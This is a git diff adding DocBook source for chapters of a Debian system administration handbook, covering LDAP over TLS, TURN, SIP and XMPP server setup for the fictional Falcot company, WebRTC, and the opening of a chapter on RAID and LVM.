+	  <literal>ldap.falcot.com</literal>.</para>
+
+	  <para>This command creates a certificate in the
+	  <filename>keys/ldap.falcot.com.crt</filename> file; the corresponding private
+	  key is stored in <filename>keys/ldap.falcot.com.key</filename>.</para>
+
+	  <para>Now these keys have to be installed in their standard
+	  location, and we must make sure that the private file is readable
+	  by the LDAP server which runs under the <literal>openldap</literal>
+	  user identity:</para>
+
+          <screen><computeroutput># </computeroutput><userinput>adduser openldap ssl-cert
+</userinput><computeroutput>Adding user `openldap' to group `ssl-cert' ...
+Adding user openldap to group ssl-cert
+Done.
+# </computeroutput><userinput>mv keys/ldap.falcot.com.key /etc/ssl/private/ldap.falcot.com.key
+</userinput><computeroutput># </computeroutput><userinput>chown root:ssl-cert /etc/ssl/private/ldap.falcot.com.key
+</userinput><computeroutput># </computeroutput><userinput>chmod 0640 /etc/ssl/private/ldap.falcot.com.key
+</userinput><computeroutput># </computeroutput><userinput>mv newcert.pem /etc/ssl/certs/ldap.falcot.com.pem
+</userinput></screen>
+
+	  <para>The <command>slapd</command> daemon also needs to be told
+	  to use these keys for encryption. The LDAP server configuration
+	  is managed dynamically: the configuration can be updated with
+	  normal LDAP operations on the <literal>cn=config</literal> object
+	  hierarchy, and the server updates <filename>/etc/ldap/slapd.d</filename>
+	  in real time to make the configuration persistent.
+	  <command>ldapmodify</command> is thus the right tool to update
+	  the configuration:</para>
+
+          <example>
+            <title>Configuring <command>slapd</command> for encryption</title>
+
+            <screen><computeroutput># </computeroutput><userinput>cat &gt;ssl.ldif &lt;&lt;END
+dn: cn=config
+changetype: modify
+add: olcTLSCertificateFile
+olcTLSCertificateFile: /etc/ssl/certs/ldap.falcot.com.pem
+-
+add: olcTLSCertificateKeyFile
+olcTLSCertificateKeyFile: /etc/ssl/private/ldap.falcot.com.key
+-
+END
+</userinput><computeroutput># </computeroutput><userinput>ldapmodify -Y EXTERNAL -H ldapi:/// -f ssl.ldif
+</userinput><computeroutput>SASL/EXTERNAL authentication started
+SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
+SASL SSF: 0
+modifying entry "cn=config"
+</computeroutput></screen>
+          </example>
+
+	  <sidebar>
+	    <title><emphasis>TOOL</emphasis> <command>ldapvi</command> to edit an LDAP directory</title>
+	    <indexterm><primary><command>ldapvi</command></primary></indexterm>
+	    <para>With <command>ldapvi</command>, you can display an LDIF
+	    output of any part of the LDAP directory, make some changes in
+	    the text editor, and let the tool do the corresponding LDAP
+	    operations for you.
+	    </para>
+	    <para>It is thus a convenient way to update the configuration
+	    of the LDAP server, simply by editing the <literal>cn=config</literal>
+	    hierarchy.</para>
+	    <screen><computeroutput># </computeroutput><userinput>ldapvi -Y EXTERNAL -h ldapi:/// -b cn=config
+</userinput></screen>
+	  </sidebar>
+
+	  <para>The last step for enabling encryption involves changing the
+	  <varname>SLAPD_SERVICES</varname> variable in the
+	  <filename>/etc/default/slapd</filename> file. We'll play it safe
+	  and disable unsecured LDAP altogether.</para>
+
+          <example>
+            <title>The <filename>/etc/default/slapd</filename> file</title>
+
+            <programlisting>
+# Default location of the slapd.conf file or slapd.d cn=config directory. If
+# empty, use the compiled-in default (/etc/ldap/slapd.d with a fallback to
+# /etc/ldap/slapd.conf).
+SLAPD_CONF=
+
+# System account to run the slapd server under. If empty the server
+# will run as root.
+SLAPD_USER="openldap"
+
+# System group to run the slapd server under. If empty the server will
+# run in the primary group of its user.
+SLAPD_GROUP="openldap"
+
+# Path to the pid file of the slapd server. If not set the init.d script
+# will try to figure it out from $SLAPD_CONF (/etc/ldap/slapd.conf by
+# default)
+SLAPD_PIDFILE=
+
+# slapd normally serves ldap only on all TCP-ports 389. slapd can also
+# service requests on TCP-port 636 (ldaps) and requests via unix
+# sockets.
+# Example usage:
+# SLAPD_SERVICES="ldap://127.0.0.1:389/ ldaps:/// ldapi:///"
+SLAPD_SERVICES="ldaps:/// ldapi:///"
+
+# If SLAPD_NO_START is set, the init script will not start or restart
+# slapd (but stop will still work).  Uncomment this if you are
+# starting slapd via some other means or if you don't want slapd normally
+# started at boot.
+#SLAPD_NO_START=1
+
+# If SLAPD_SENTINEL_FILE is set to path to a file and that file exists,
+# the init script will not start or restart slapd (but stop will still
+# work).  Use this for temporarily disabling startup of slapd (when doing
+# maintenance, for example, or through a configuration management system)
+# when you don't want to edit a configuration file.
+SLAPD_SENTINEL_FILE=/etc/ldap/noslapd
+
+# For Kerberos authentication (via SASL), slapd by default uses the system
+# keytab file (/etc/krb5.keytab).  To use a different keytab file,
+# uncomment this line and change the path.
+#export KRB5_KTNAME=/etc/krb5.keytab
+
+# Additional options to pass to slapd
+SLAPD_OPTIONS=""
+</programlisting>
+          </example>
+        </section>
+        <section>
+          <title>Configuring the Client</title>
+
+	  <para>On the client side, the configuration for the
+	  <emphasis>libpam-ldap</emphasis> and
+	  <emphasis>libnss-ldap</emphasis> modules needs to be modified
+	  to use an <literal>ldaps://</literal> URI.</para>
+
+	  <para>LDAP clients also need to be able to authenticate the
+	  server. In a X.509 public key infrastructure, public certificates
+	  are signed by the key of a certificate authority (CA). With
+	  <emphasis>easy-rsa</emphasis>, the Falcot administrators
+	  have created their own CA and they now need to configure
+	  the system to trust the signatures of Falcot's CA. This can
+	  be done by putting the CA certificate in
+	  <filename>/usr/local/share/ca-certificates</filename> and
+	  running <command>update-ca-certificates</command>.</para>
+	  
+	  <screen><computeroutput># </computeroutput><userinput>cp keys/ca.crt /usr/local/share/ca-certificates/falcot.crt
+</userinput><computeroutput># </computeroutput><userinput>update-ca-certificates
+</userinput><computeroutput>Updating certificates in /etc/ssl/certs... 1 added, 0 removed; done.
+Running hooks in /etc/ca-certificates/update.d....
+Adding debian:falcot.pem
+done.
+done.
+</computeroutput></screen>
+
+	  <para>Last but not least, the default LDAP URI and default base
+	  DN used by the various command line tools can be modified
+	  in <filename>/etc/ldap/ldap.conf</filename>. This will save
+	  quite some typing.</para>
+
+          <example>
+            <title>The <filename>/etc/ldap/ldap.conf</filename> file</title>
+
+            <programlisting>#
+# LDAP Defaults
+#
+
+# See ldap.conf(5) for details
+# This file should be world readable but not world writable.
+
+BASE   dc=falcot,dc=com
+URI    ldaps://ldap.falcot.com
+
+#SIZELIMIT      12
+#TIMELIMIT      15
+#DEREF          never
+
+# TLS certificates (needed for GnuTLS)
+TLS_CACERT      /etc/ssl/certs/ca-certificates.crt
+</programlisting>
+          </example>
+
+        </section>
+      </section>
+    </section>
+  </section>
+  <section id="sect.rtc-services">
+    <title>Real-Time Communication Services</title>
+
+    <para>Real-Time Communication (RTC) services include voice,
+    video/webcam, instant messaging (IM) and desktop sharing.
+    This chapter gives a brief introduction to three of the
+    services required to operate RTC, including a TURN server,
+    SIP server and XMPP server. Comprehensive details of how to plan, install
+    and manage these services are available in the Real-Time Communications
+    Quick Start Guide which includes examples specific to Debian.
+    <ulink type="block" url="http://rtcquickstart.org" />
+    </para>
+    <indexterm><primary>VoIP</primary><secondary>server</secondary></indexterm>
+    <indexterm><primary>RTC</primary><secondary>server</secondary></indexterm>
+    <indexterm><primary>Instant Messaging</primary><secondary>server</secondary></indexterm>
+    <indexterm><primary>Chat</primary><secondary>server</secondary></indexterm>
+
+    <para>Both SIP and XMPP can provide the same functionality.  SIP
+    is slightly more well known for voice and video while XMPP is
+    traditionally regarded as an IM protocol. In fact, they can both
+    be used for any of these purposes.  To maximize connectivity options,
+    it is recommended to run both in parallel.</para>
+    <indexterm><primary>SIP</primary></indexterm>
+    <indexterm><primary>XMPP</primary></indexterm>
+
+    
+    <para>These services rely on X.509 certificates both for authentication
+    and confidentiality purposes. See <xref linkend="sect.easy-rsa" /> for
+    details on how to create them. Alternatively the <emphasis>Real-Time
+    Communications Quick Start Guide</emphasis> also has some useful
+    explanations:
+    <ulink type="block" url="http://rtcquickstart.org/guide/multi/tls.html" />
+    </para>
+
+    <section id="sect.rtc-dns-settings">
+      <title>DNS settings for RTC services</title>
+
+      <para>RTC services require DNS SRV and NAPTR records.  A sample
+      configuration that can be placed in the zone file for
+      <literal>falcot.com</literal>:</para>
+      <indexterm><primary>DNS</primary><secondary>SRV record</secondary></indexterm>
+      <indexterm><primary>DNS</primary><secondary>NAPTR record</secondary></indexterm>
+
+<programlisting>
+; the server where everything will run
+server1            IN     A      198.51.100.19
+server1            IN     AAAA   2001:DB8:1000:2000::19
+
+; IPv4 only for TURN for now, some clients are buggy with IPv6
+turn-server        IN     A      198.51.100.19
+
+; IPv4 and IPv6 addresses for SIP
+sip-proxy          IN     A      198.51.100.19
+sip-proxy          IN     AAAA   2001:DB8:1000:2000::19
+
+; IPv4 and IPv6 addresses for XMPP
+xmpp-gw            IN     A      198.51.100.19
+xmpp-gw            IN     AAAA   2001:DB8:1000:2000::19
+
+; DNS SRV and NAPTR for STUN / TURN
+_stun._udp  IN SRV    0 1 3467 turn-server.falcot.com.
+_turn._udp  IN SRV    0 1 3467 turn-server.falcot.com.
+@           IN NAPTR  10 0 "s" "RELAY:turn.udp" "" _turn._udp.falcot.com.
+
+; DNS SRV and NAPTR records for SIP
+_sips._tcp  IN SRV    0 1 5061 sip-proxy.falcot.com.
+@           IN NAPTR  10 0 "s" "SIPS+D2T" "" _sips._tcp.falcot.com.
+
+; DNS SRV records for XMPP Server and Client modes:
+_xmpp-client._tcp  IN     SRV    5 0 5222 xmpp-gw.falcot.com.
+_xmpp-server._tcp  IN     SRV    5 0 5269 xmpp-gw.falcot.com.
+</programlisting>
+    </section>
+
+    <section id="sect.turn-server">
+      <title>TURN Server</title>
+
+      <para>TURN is a service that helps clients behind NAT routers and
+      firewalls to discover the most efficient way to communicate with other
+      clients and to relay the media streams if no direct media path can be
+      found. It is highly recommended that the TURN server is installed
+      before any of the other RTC services are offered to end users.</para>
+      <indexterm><primary>TURN</primary><secondary>server</secondary></indexterm>
+
+      <para>TURN and the related ICE protocol are open standards.
+      To benefit from these protocols, maximizing connectivity and
+      minimizing user frustration, it is important to ensure that all
+      client software supports ICE and TURN.</para>
+      <indexterm><primary>ICE</primary></indexterm>
+
+      <para>For the ICE algorithm to work effectively, the server must
+      have two public IPv4 addresses.</para>
+      <section id="sect.turn-server-install">
+        <title>Install the TURN server</title>
+        <para>Install the <emphasis role="pkg">resiprocate-turn-server</emphasis> package.</para>
+
+        <para>Edit the
+        <filename>/etc/reTurn/reTurnServer.config</filename>
+        configuration file. The most important thing to do is insert
+        the IP addresses of the server.</para>
+
+<programlisting>
+# your IP addresses go here:
+TurnAddress = 198.51.100.19
+TurnV6Address = 2001:DB8:1000:2000::19
+AltStunAddress = 198.51.100.20
+# your domain goes here, it must match the value used
+# to hash your passwords if they are already hashed
+# using the HA1 algorithm:
+AuthenticationRealm = myrealm
+
+UserDatabaseFile = /etc/reTurn/users.txt
+UserDatabaseHashedPasswords = true
+</programlisting>
+
+        <para>Restart the service.</para>
+      </section>
+      <section id="sect.turn-server-management">
+        <title>Managing the TURN users</title>
+        <para>Use the htdigest utility to manage the TURN server user list.
+        </para>
+<screen><computeroutput># </computeroutput><userinput>htdigest /etc/reTurn/users.txt myrealm joe</userinput>
+</screen>
+        <para>Use the HUP signal to make the server reload the
+        <filename>/etc/reTurn/users.txt</filename> file after changing it
+        or enable the automatic reload feature in
+        <filename>/etc/reTurn/reTurnServer.config</filename>.</para>
+      </section>
+    </section>
+
+    <section id="sect.sip-server">
+      <title>SIP Proxy Server</title>
+
+      <para>A SIP proxy server manages the incoming and outgoing SIP
+      connections between other organizations, SIP trunking providers,
+      SIP PBXes such as Asterisk, SIP phones, SIP-based softphones
+      and WebRTC applications.</para>
+      <indexterm><primary>SIP</primary><secondary>server</secondary></indexterm>
+      <indexterm><primary>SIP</primary><secondary>proxy</secondary></indexterm>
+      <indexterm><primary>SIP</primary><secondary>PBX</secondary></indexterm>
+      <indexterm><primary>SIP</primary><secondary>trunk</secondary></indexterm>
+
+      <para>It is strongly recommended to install and configure the SIP
+      proxy before attempting a SIP PBX setup. The SIP proxy normalizes
+      a lot of the traffic reaching the PBX and provides greater
+      connectivity and resilience.</para>
+
+      <section id="sect.sip-server-install">
+        <title>Install the SIP proxy</title>
+        <para>Install the <emphasis role="pkg">repro</emphasis> package.
+          Using the package from <emphasis role="distribution">jessie-backports</emphasis> is highly
+          recommended, as it has the latest improvements for maximizing
+          connectivity and resilience.
+        </para>
+        <indexterm><primary>repro</primary></indexterm>
+
+        <para>
+          Edit the <filename>/etc/repro/repro.config</filename>
+          configuration file. The most important thing to do is insert the
+          IP addresses of the server.  The example below demonstrates how
+          to setup both regular SIP and WebSockets/WebRTC, using TLS, IPv4
+          and IPv6:
+        </para>
+
+<programlisting>
+# Transport1 will be for SIP over TLS connections
+# We use port 5061 here but if you have clients connecting from
+# locations with firewalls you could change this to listen on port 443
+Transport1Interface = 198.51.100.19:5061
+Transport1Type = TLS
+Transport1TlsDomain = falcot.com
+Transport1TlsClientVerification = Optional
+Transport1RecordRouteUri = sip:falcot.com;transport=TLS
+Transport1TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport1TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport2 is the IPv6 version of Transport1
+Transport2Interface = 2001:DB8:1000:2000::19:5061
+Transport2Type = TLS
+Transport2TlsDomain = falcot.com
+Transport2TlsClientVerification = Optional
+Transport2RecordRouteUri = sip:falcot.com;transport=TLS
+Transport2TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport2TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport3 will be for SIP over WebSocket (WebRTC) connections
+# We use port 8443 here but you could use 443 instead
+Transport3Interface = 198.51.100.19:8443
+Transport3Type = WSS
+Transport3TlsDomain = falcot.com
+# This would require the browser to send a certificate, but browsers
+# don't currently appear to be able to, so leave it as None:
+Transport3TlsClientVerification = None
+Transport3RecordRouteUri = sip:falcot.com;transport=WSS
+Transport3TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport3TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport4 is the IPv6 version of Transport3
+Transport4Interface = 2001:DB8:1000:2000::19:8443
+Transport4Type = WSS
+Transport4TlsDomain = falcot.com
+Transport4TlsClientVerification = None
+Transport4RecordRouteUri = sip:falcot.com;transport=WSS
+Transport4TlsPrivateKey = /etc/ssl/private/falcot.com-key.pem
+Transport4TlsCertificate = /etc/ssl/public/falcot.com.pem
+
+# Transport5: this could be for TCP connections to an Asterisk server
+# in your internal network.  Don't allow port 5060 through the external
+# firewall.
+Transport5Interface = 198.51.100.19:5060
+Transport5Type = TCP
+Transport5RecordRouteUri = sip:198.51.100.19:5060;transport=TCP
+
+HttpBindAddress = 198.51.100.19, 2001:DB8:1000:2000::19
+HttpAdminUserFile = /etc/repro/users.txt
+
+RecordRouteUri = sip:falcot.com;transport=tls
+ForceRecordRouting = true
+EnumSuffixes = e164.arpa, sip5060.net, e164.org
+DisableOutbound = false
+EnableFlowTokens = true
+EnableCertificateAuthenticator = True
+</programlisting>
+
+        <para>
+          Use the <command>htdigest</command> utility to manage the
+          admin password for the web interface.  The username must be
+          <emphasis>admin</emphasis> and the realm name must match the
+          value specified in <filename>repro.config</filename>.
+        </para>
+
+<screen><computeroutput># </computeroutput><userinput>htdigest /etc/repro/users.txt repro admin</userinput>
+</screen>
+
+        <para>Restart the service to use the new configuration.</para>
+      </section>
+      <section id="sect.sip-server-management">
+        <title>Managing the SIP proxy</title>
+        <para>Go to the web interface at
+        <literal>http://sip-proxy.falcot.com:5080</literal> to
+        complete the configuration by adding domains, local users
+        and static routes.</para>
+
+        <para>The first step is to add the local domain.  The
+        process must be restarted after adding or removing domains
+        from the list.</para>
+
+        <para>The proxy knows how to route calls between local users
+        and full SIP address, the routing configuration is only necessary
+        for overriding default behavior, for example, to recognize phone
+        numbers, add a prefix and route them to a SIP provider.</para>
+      </section>
+    </section>
+
+    <section id="sect.xmpp-server">
+      <title>XMPP Server</title>
+
+      <para>An XMPP server manages connectivity between local XMPP users
+      and XMPP users in other domains on the public Internet.</para>
+      <indexterm><primary>XMPP</primary><secondary>server</secondary></indexterm>
+
+      <sidebar>
+        <title><emphasis>VOCABULARY</emphasis> XMPP or Jabber?</title>
+        <indexterm><primary>Jabber</primary></indexterm>
+
+        <para>XMPP is sometimes referred to as Jabber.  In fact,
+        Jabber is a trademark and XMPP is the official name of the standard.
+        </para>
+        <indexterm><primary>Jabber</primary></indexterm>
+      </sidebar>
+
+      <para>Prosody is a popular XMPP server that operates reliably
+      on Debian servers.</para>
+      <indexterm><primary>Prosody</primary></indexterm>
+      <section id="sect.xmpp-server-install">
+        <title>Install the XMPP server</title>
+        <para>
+          Install the <emphasis role="pkg">prosody</emphasis> package.
+          Using the package from <emphasis role="distribution">jessie-backports</emphasis> is highly
+          recommended, as it has the latest improvements for maximizing
+          connectivity and resilience.
+        </para>
+        <indexterm><primary>Prosody</primary></indexterm>
+
+        <para>Review the <filename>/etc/prosody/prosody.cfg.lua</filename>
+        configuration file. The most important thing to do is insert JIDs
+        of the users who are permitted to manage the server.</para>
+
+<programlisting>
+admins = { "joe@falcot.com" }
+</programlisting>
+
+        <para>An individual configuration file is also needed for
+        each domain. Copy the sample from
+        <filename>/etc/prosody/conf.avail/example.com.cfg.lua</filename>
+        and use it as a starting point. Here is
+        <literal>falcot.com.cfg.lua</literal>:</para>
+
+<programlisting>
+VirtualHost "falcot.com"
+        enabled = true
+        ssl = {
+                key = "/etc/ssl/private/falcot.com-key.pem";
+                certificate = "/etc/ssl/public/falcot.com.pem";
+                }
+</programlisting>
+
+        <para>To enable the domain, there must be a symlink from
+          <filename>/etc/prosody/conf.d/</filename>. Create it that way:</para>
+
+<screen><computeroutput># </computeroutput><userinput>ln -s /etc/prosody/conf.avail/falcot.com.cfg.lua /etc/prosody/conf.d/</userinput>
+</screen>
+
+        <para>Restart the service to use the new configuration.</para>
+      </section>
+      <section id="sect.xmpp-server-management">
+        <title>Managing the XMPP server</title>
+        <para>Some management operations can be performed using the
+        <literal>prosodyctl</literal> command line utility. For example, to
+        add the administrator account specified in
+        <filename>/etc/prosody/prosody.cfg.lua</filename>:</para>
+<programlisting>
+# prosodyctl adduser joe@falcot.com
+</programlisting>
+
+        <para>See the <ulink url="http://prosody.im/doc/configure">
+        Prosody online documentation</ulink> for more details about
+        how to customize the configuration.</para>
+
+      </section>
+
+    </section>
+    <section id="sect.rtc-port-443">
+      <title>Running services on port 443</title>
+      <para>Some administrators prefer to run all of their RTC services on
+      port 443. This helps users to connect from remote locations such as
+      hotels and airports where other ports may be blocked or
+      Internet traffic is routed through HTTP proxy servers.</para>
+
+      <para>To use this strategy, each service (SIP, XMPP and TURN)
+      needs a different IP address. All the services can still be on the
+      same host as Linux supports multiple IP addresses on a single host.
+      The port number, 443, must be specified in the configuration
+      files for each process and also in the DNS SRV records.</para>
+    </section>
+    <section id="sect.rtc-webrtc">
+      <title>Adding WebRTC</title>
+
+      <para>Falcot wants to let customers make phone calls directly from
+      the web site. The Falcot administrators also want to use WebRTC as
+      part of their disaster recovery plan, so staff can use web browsers
+      at home to log in to the company phone system and work normally in
+      an emergency.</para>
+      <indexterm><primary>WebRTC</primary></indexterm>
+      <indexterm><primary>SIP</primary><secondary>WebSockets</secondary></indexterm>
+
+      <sidebar>
+        <title><emphasis>IN PRACTICE</emphasis> Try WebRTC</title>
+        <indexterm><primary>WebRTC</primary><secondary>demonstration</secondary></indexterm>
+
+        <para>If you have not tried WebRTC before, there are various
+        sites that give an online demonstration and test facilities.
+        <ulink type="block" url="http://www.sip5060.net/test-calls" /></para>        
+      </sidebar>
+
+      <para>
+        WebRTC is a rapidly evolving technology and it is essential to
+        use packages from the <emphasis role="distribution">jessie-backports</emphasis> or <emphasis role="distribution">Testing</emphasis> distributions.
+      </para>
+
+      <para>JSCommunicator is a generic, unbranded WebRTC phone that does
+      not require any server-side scripting such as PHP. It is built
+      exclusively with HTML, CSS and JavaScript. It is the basis
+      for many other WebRTC services and modules for more advanced
+      web publishing frameworks.
+      <ulink type="block" url="http://jscommunicator.org" />
+      </para>
+      <indexterm><primary>JSCommunicator</primary></indexterm>
+
+      <para>The package
+      <emphasis role="pkg">jscommunicator-web-phone</emphasis> is the
+      quickest way to install a WebRTC phone into a web site.
+      It requires a SIP proxy with a WebSocket transport. The instructions in
+      <xref linkend="sect.sip-server-install" /> include the necessary
+      details to enable the WebSocket transport in the
+      <emphasis role="pkg">repro</emphasis> SIP proxy.</para>
+
+      <para>After installing
+      <emphasis role="pkg">jscommunicator-web-phone</emphasis>,
+      there are various ways to use it. A simple strategy is to include
+      or copy the configuration from
+      <filename>/etc/jscommunicator-web-phone/apache.conf</filename>
+      into an Apache virtual host configuration.</para>
+
+      <para>Once the web-phone files are available in the web server,
+      customize the
+      <filename>/etc/jscommunicator-web-phone/config.js</filename> to point
+      at the TURN server and SIP proxy. For example:</para>
+
+<programlisting>
+JSCommSettings = {
+
+  // Web server environment
+  webserver: {
+    url_prefix: null            // If set, prefix used to construct sound/ URLs
+  },
+
+  // STUN/TURN media relays
+  stun_servers: [],
+  turn_servers: [
+    { server:"turn:turn-server.falcot.com?transport=udp", username:"joe", password:"j0Ep455d" }
+  ],
+
+  // WebSocket connection
+  websocket: {
+      // Notice we use the falcot.com domain certificate and port 8443
+      // This matches the Transport3 and Transport4 example in
+      // the falcot.com repro.config file
+    servers: 'wss://falcot.com:8443',
+    connection_recovery_min_interval: 2,
+    connection_recovery_max_interval: 30
+  },
+
+  ...
+</programlisting>
+
+      <para>More advanced click-to-call web sites typically use server-side
+      scripting to generate the <literal>config.js</literal> file dynamically.
+      The <ulink url="http://drucall.org">DruCall</ulink> source code
+      demonstrates how to do this with PHP.</para>
+      <indexterm><primary>DruCall</primary></indexterm>
+
+      <para>This chapter sampled only a fraction of the available
+      server software; however, most of the common network services
+      were described. Now it is time for an even more technical
+      chapter: we'll go into deeper detail for some concepts, describe
+      massive deployments and virtualization.</para>
+
+    </section>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/12_advanced-administration.xml b/tmp/cs-CZ/xml_tmp/12_advanced-administration.xml
new file mode 100644
index 000000000..853c4cc57
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/12_advanced-administration.xml
@@ -0,0 +1,3572 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="advanced-administration">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-advanced-administration.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>RAID</keyword>
+      <keyword>LVM</keyword>
+      <keyword>FAI</keyword>
+      <keyword>Preseeding</keyword>
+      <keyword>Monitoring</keyword>
+      <keyword>Virtualization</keyword>
+      <keyword>Xen</keyword>
+      <keyword>LXC</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Advanced Administration</title>
+  <highlights>
+    <para>This chapter revisits some aspects we already described, with a
+    different perspective: instead of installing one single computer, we
+    will study mass-deployment systems; instead of creating RAID or LVM
+    volumes at install time, we'll learn to do it by hand so we can later
+    revise our initial choices. Finally, we will discuss monitoring tools
+    and virtualization techniques. As a consequence, this chapter is more
+    particularly targeting professional administrators, and focuses
+    somewhat less on individuals responsible for their home network.</para>
+  </highlights>
+  <section id="sect.raid-and-lvm">
+    <title>RAID and LVM</title>
+
+    <para><xref linkend="installation" /> presented these technologies from
+    the point of view of the installer, and how it integrated them to make
+    their deployment easy from the start. After the initial installation,
+    an administrator must be able to handle evolving storage space needs
+    without having to resort to an expensive reinstallation. They must
+    therefore understand the required tools for manipulating RAID and LVM
+    volumes.</para>
+
+    <para>RAID and LVM are both techniques to abstract the mounted
+    volumes from their physical counterparts (actual hard-disk drives
+    or partitions thereof); the former secures the data against
+    hardware failure by introducing redundancy, the latter makes
+    volume management more flexible and independent of the actual size
+    of the underlying disks. In both cases, the system ends up with
+    new block devices, which can be used to create filesystems or swap
+    space, without necessarily having them mapped to one physical
+    disk.  RAID and LVM come from quite different backgrounds, but
+    their functionality can overlap somewhat, which is why they are
+    often mentioned together.</para>
+
+    <sidebar>
+      <title><emphasis>PERSPECTIVE</emphasis> Btrfs combines LVM and RAID</title>
+
+      <para>While LVM and RAID are two distinct kernel subsystems that
+      come between the disk block devices and their filesystems,
+      <emphasis>btrfs</emphasis> is a new filesystem, initially
+      developed at Oracle, that purports to combine the featuresets of
+      LVM and RAID and much more. It is mostly functional, and
+      although it is still tagged “experimental” because its
+      development is incomplete (some features aren't implemented
+      yet), it has already seen some use in production environments.
+      <ulink type="block" url="http://btrfs.wiki.kernel.org/" /></para>
+
+      <para>Among the noteworthy features are the ability to take a
+      snapshot of a filesystem tree at any point in time. This snapshot
+      copy doesn't initially use any disk space, the data only being
+      duplicated when one of the copies is modified. The filesystem also
+      handles transparent compression of files, and checksums ensure the
+      integrity of all stored data.</para>
+    </sidebar>
+
+    <para>In both the RAID and LVM cases, the kernel provides a block
+    device file, similar to the ones corresponding to a hard disk drive or
+    a partition. When an application, or another part of the kernel,
+    requires access to a block of such a device, the appropriate subsystem
+    routes the block to the relevant physical layer. Depending on the
+    configuration, this block can be stored on one or several physical
+    disks, and its physical location may not be directly correlated to the
+    location of the block in the logical device.</para>
+    <section id="sect.raid-soft">
+      <title>Software RAID</title>
+      <indexterm><primary>RAID</primary></indexterm>
+
+      <para>RAID means <emphasis>Redundant Array of Independent
+      Disks</emphasis>. The goal of this system is to prevent data loss in
+      case of hard disk failure. The general principle is quite simple:
+      data are stored on several physical disks instead of only one, with a
+      configurable level of redundancy. Depending on this amount of
+      redundancy, and even in the event of an unexpected disk failure, data
+      can be losslessly reconstructed from the remaining disks.</para>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> <foreignphrase>Independent</foreignphrase> or <foreignphrase>inexpensive</foreignphrase>?</title>
+
+	<para>The I in RAID initially stood for
+	<emphasis>inexpensive</emphasis>, because RAID allowed a drastic
+	increase in data safety without requiring investing in expensive
+	high-end disks. Probably due to image concerns, however, it is now
+	more customarily considered to stand for
+	<emphasis>independent</emphasis>, which doesn't have the unsavory
+	flavour of cheapness.</para>
+      </sidebar>
+
+      <para>RAID can be implemented either by dedicated hardware (RAID
+      modules integrated into SCSI or SATA controller cards) or by software
+      abstraction (the kernel). Whether hardware or software, a RAID system
+      with enough redundancy can transparently stay operational when a disk
+      fails; the upper layers of the stack (applications) can even keep
+      accessing the data in spite of the failure. Of course, this
+      “degraded mode” can have an impact on performance, and redundancy
+      is reduced, so a further disk failure can lead to data loss. In
+      practice, therefore, one will strive to only stay in this degraded
+      mode for as long as it takes to replace the failed disk. Once the new
+      disk is in place, the RAID system can reconstruct the required data
+      so as to return to a safe mode. The applications won't notice
+      anything, apart from potentially reduced access speed, while the
+      array is in degraded mode or during the reconstruction phase.</para>
+
+      <para>When RAID is implemented by hardware, its configuration
+      generally happens within the BIOS setup tool, and the kernel
+      will consider a RAID array as a single disk, which will work as
+      a standard physical disk, although the device name may be
+      different (depending on the driver).</para>
+
+      <para>We only focus on software RAID in this book.</para>
+
+      <section id="sect.raid-levels">
+        <title>Different RAID Levels</title>
+
+	<para>RAID is actually not a single system, but a range of
+	systems identified by their levels; the levels differ by their layout
+	and the amount of redundancy they provide. The more redundant,
+	the more failure-proof, since the system will be able to keep
+	working with more failed disks. The counterpart is that the
+	usable space shrinks for a given set of disks; seen the other
+	way, more disks will be needed to store a given amount of
+	data.</para>
+        <variablelist>
+          <varlistentry>
+            <term>Linear RAID</term>
+            <listitem>
+	      <para>Even though the kernel's RAID subsystem allows creating
+	      “linear RAID”, this is not proper RAID, since this setup
+	      doesn't involve any redundancy. The kernel merely aggregates
+	      several disks end-to-end and provides the resulting
+	      aggregated volume as one virtual disk (one block device).
+	      That's about its only function. This setup is rarely used by
+	      itself (see later for the exceptions), especially since the
+	      lack of redundancy means that one disk failing makes the
+	      whole aggregate, and therefore all the data,
+	      unavailable.</para>
+            </listitem>
+          </varlistentry>
+          <varlistentry>
+            <term>RAID-0</term>
+            <listitem>
+	      <para>This level doesn't provide any redundancy either, but
+	      disks aren't simply stuck on end one after another: they are
+	      divided in <emphasis>stripes</emphasis>, and the blocks on
+	      the virtual device are stored on stripes on alternating
+	      physical disks. In a two-disk RAID-0 setup, for instance,
+	      even-numbered blocks of the virtual device will be stored on
+	      the first physical disk, while odd-numbered blocks will end
+	      up on the second physical disk.</para>
+
+	      <para>This system doesn't aim at increasing reliability,
+	      since (as in the linear case) the availability of all the
+	      data is jeopardized as soon as one disk fails, but at
+	      increasing performance: during sequential access to large
+	      amounts of contiguous data, the kernel will be able to read
+	      from both disks (or write to them) in parallel, which
+	      increases the data transfer rate. However, RAID-0 use is
+	      shrinking, its niche being filled by LVM (see later).</para>
+            </listitem>
+          </varlistentry>
+          <varlistentry>
+            <term>RAID-1</term>
+            <listitem>
+	      <para>This level, also known as “RAID mirroring”, is both
+	      the simplest and the most widely used setup. In its standard
+	      form, it uses two physical disks of the same size, and
+	      provides a logical volume of the same size again. Data are
+	      stored identically on both disks, hence the “mirror”
+	      nickname. When one disk fails, the data is still available on
+	      the other. For really critical data, RAID-1 can of course be
+	      set up on more than two disks, with a direct impact on the
+	      ratio of hardware cost versus available payload space.</para>
+
+              <sidebar>
+                <title><emphasis>NOTE</emphasis> Disks and cluster sizes</title>
+
+		<para>If two disks of different sizes are set up in a
+		mirror, the bigger one will not be fully used, since it
+		will contain the same data as the smallest one and nothing
+		more. The useful available space provided by a RAID-1
+		volume therefore matches the size of the smallest disk in
+		the array. This still holds for RAID volumes with a higher
